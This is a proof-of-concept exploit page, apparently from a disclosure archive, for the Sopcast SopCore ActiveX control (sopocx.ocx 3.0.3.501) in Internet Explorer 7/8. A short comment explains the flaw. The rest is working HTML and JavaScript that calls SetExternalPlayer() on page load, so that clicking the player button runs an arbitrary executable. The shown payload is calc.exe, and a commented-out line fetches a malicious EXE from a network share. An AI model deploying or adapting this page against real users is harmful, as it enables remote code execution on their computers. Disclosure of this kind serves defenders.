Sopcast SopCore Control Command Execution

`<!-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()  
user assisted remote code execution poc  
by Nine:Situations:Group::surfista (IE7/8)  
  
our site: http://retrogod.altervista.org/  
software site: http://www.sopcast.org/  
  
Through the SetExternalPlayer() method and the ExternalPlayer property  
is possible to associate an arbitrary executable to the "external player"  
button (for clearness see http://www.sopcast.com/docs/ where the player  
control buttons are showed) which opens Windows Media Player by default.  
When the user click this button, the executable is launched without prompts  
Also this value is stored in config.xml, inside the sopcast local folder  
for further use, ex. with the sopcast client application  
Note: this control is safe for scripting and safe for initialization  
-->  
<HTML>  
<HEAD>  
<script language="Javascript" type="text/JavaScript">  
window.onload=function()  
{  
SopPlayer.InitPlayer();  
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");  
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");  
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...  
SopPlayer.SetChannelName("CCTV5");  
SopPlayer.Play();  
}  
</script>  
</HEAD>  
<BODY>  
<OBJECT  
ID="SopPlayer"  
name="SopPlayer"  
CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659  
HEIGHT=375  
WIDTH=375>  
</OBJECT>  
</BODY>  
</HTML>  
  
`